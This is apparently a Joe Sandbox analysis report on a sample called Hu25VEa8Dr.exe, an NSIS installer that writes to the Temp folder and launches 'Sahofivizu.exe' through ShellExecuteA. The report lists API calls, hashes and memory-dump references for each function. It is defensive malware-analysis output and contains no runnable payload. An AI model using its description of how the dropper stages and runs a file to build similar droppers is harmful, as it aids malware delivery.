Instruction ID: 46a167c19d0f92bb62e791f7a1b0a3e0954e7dde2177130d433e16ae92940f3d
Opcode Fuzzy Hash: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
Instruction Fuzzy Hash: 84510130904A5476DB21AB218C85BFF3A68DF4231AF14813BF941752D2C77C49C2DE5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2E Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
LoadLibraryA.KERNEL32(?), ref: 00405D4B
GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: 58781945b1ebe0d6425232f008294b0fb1b641fb0524d4e5e5734917004db801
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 8CE08C36A04510BBD3215B30AE08A6B73ACEEC9B41304897EF615F6251D734AC11DBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00405D07 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,0042C030,0042B3E8,00405623,0042B3E8,0042B3E8,00000000,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000), ref: 00405D12
FindClose.KERNEL32(00000000), ref: 00405D1E

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction ID: 6bc8dc8487d68019062fb65c0caa7a5850599756ae9c65598668cc32d68c0862
Opcode Fuzzy Hash: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction Fuzzy Hash: C5D0123195D5309BD31017797C0C85B7A58DF293317108A33F025F22E0D3749C519AED

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32("C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Hu25VEa8Dr.exe,00000400), ref: 00402C4F

Part of subcall function 004056E3: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 004056E7
Part of subcall function 004056E3: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hu25VEa8Dr.exe,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 00402C9B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
Inst, xrefs: 00402D07
C:\Users\user\Desktop\Hu25VEa8Dr.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
Error launching installer, xrefs: 00402C72
Null, xrefs: 00402D19
C:\Users\user\Desktop, xrefs: 00402C7D, 00402C82, 00402C88
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 00402C2C
soft, xrefs: 00402D10

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hu25VEa8Dr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-595648611
Opcode ID: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction ID: 5cdc40c0d59b83eec34e45f83230a383a342561faf5f4e8ee161a7b3089b1b43
Opcode Fuzzy Hash: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction Fuzzy Hash: 40512371A00214ABDB20DF61DE89B9E7BA8EF04329F10413BF905B62D1D7BC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EC2
GetTickCount.KERNEL32(a\A,00414B88,00004000), ref: 00402F69
MulDiv.KERNEL32 ref: 00402F92
wsprintfA.USER32 ref: 00402FA2
WriteFile.KERNELBASE(00000000,00000000,0041DB88,7FFFFFFF,00000000), ref: 00402FD0

Strings

a\A, xrefs: 00402F2F, 00402F41
... %d%%, xrefs: 00402F9C

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$a\A
API String ID: 4209647438-1826951565
Opcode ID: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction ID: 0d39cdfb2b20f01ea0ef459ff81ac6f09524c508dd7874cbed1e127a204ff5ac
Opcode Fuzzy Hash: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction Fuzzy Hash: 3D618D7190121AEBDF10CF65DA44A9E7BB8EF04366F10413BF800B72D4D7789A51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,00409B80,00409B80,00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

Strings

open Sahofivizu.exe, xrefs: 00401801, 0040181D
fd , xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$fd $open Sahofivizu.exe
API String ID: 1941528284-1568267452
Opcode ID: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction ID: 2412d90e5cc6ef50ac46e2462e63b4f26081636668b1d4f665875a47291bc265
Opcode Fuzzy Hash: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction Fuzzy Hash: 4341D831A10515BACF10BBB5DD86DAF3A69EF41328B24433BF511F11E2D67C4A418E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405593: CharNextA.USER32(ES@), ref: 004055A1
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055A6
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055B5

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-2935972921
Opcode ID: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
Instruction ID: bf1eb0eabc3c1df6ff2fb323ed3efcd7168262dea338722757ad05095e7f5395
Opcode Fuzzy Hash: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
Instruction Fuzzy Hash: AB012631908180AFDB217F756D449BF6BB0EA56365728073FF492B22E2C23C4D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 00405712 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32("C:\Users\user\Desktop\Hu25VEa8Dr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405725
GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040573F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405712, 00405715
nsa, xrefs: 0040571E
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 00405719

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2798350797
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 857343acb9398127b83b67a88284cb3acf20d602f6beb627bdaaa73bf87bc8f8
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 19F0A736348204BAE7105E55DC04B9B7F99DFD1750F14C027F9449B1C0D6F099589BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 004030E7

Strings

1033, xrefs: 004030EE
C:\Users\user\AppData\Local\Temp\, xrefs: 004030C7, 004030CC, 004030D2, 004030DE, 004030E6, 004030ED

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1176120985
Opcode ID: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction ID: 7f1b43601f0a10077d0081c2ba5ec5825ac71a1bded9547d22d949ebda8a6a9f
Opcode Fuzzy Hash: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction Fuzzy Hash: B6D0922150AD3031D651322A3E06BCF154D8F4636AF65807BF944B608A4A6C2A825AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00401DC1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E07

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401DF2

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 587946157-2935972921
Opcode ID: 3dc99a1e9f4d2a7ff469985d076f4f0b18b0b581c00dd406e6359dc7570937ce
Instruction ID: 1d9e37e4724715ff8eb4cd61c52570f4e17590a8471f76494d0d603f05069ab9
Opcode Fuzzy Hash: 3dc99a1e9f4d2a7ff469985d076f4f0b18b0b581c00dd406e6359dc7570937ce
Instruction Fuzzy Hash: C3F04C73B04301AACB50AFB19D4AE5E3BA8AB41398F200637F510F70C1D9FC8801B318

Uniqueness

Uniqueness Score: -1.00%

Function 004023AF Relevance: 3.1, APIs: 2, Instructions: 57
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B00: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28

RegQueryValueExA.ADVAPI32 ref: 004023DF
RegCloseKey.ADVAPI32(?), ref: 0040247D

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c895cf90978fe9ef530acde7783083059366b6ad1ee30967e7d08bcc3b791e82
Instruction ID: b014844320ad767dada11dd3629d5dc4f3fca22d365999f113298c01dbc1c66c
Opcode Fuzzy Hash: c895cf90978fe9ef530acde7783083059366b6ad1ee30967e7d08bcc3b791e82
Instruction Fuzzy Hash: B011C471904205EFDB15DF64CA889AE7BB4EF14348F20807FE442B72C1D2B88A45EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004056E3 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 004056E7
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00401B06 Relevance: 2.6, APIs: 2, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B75
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
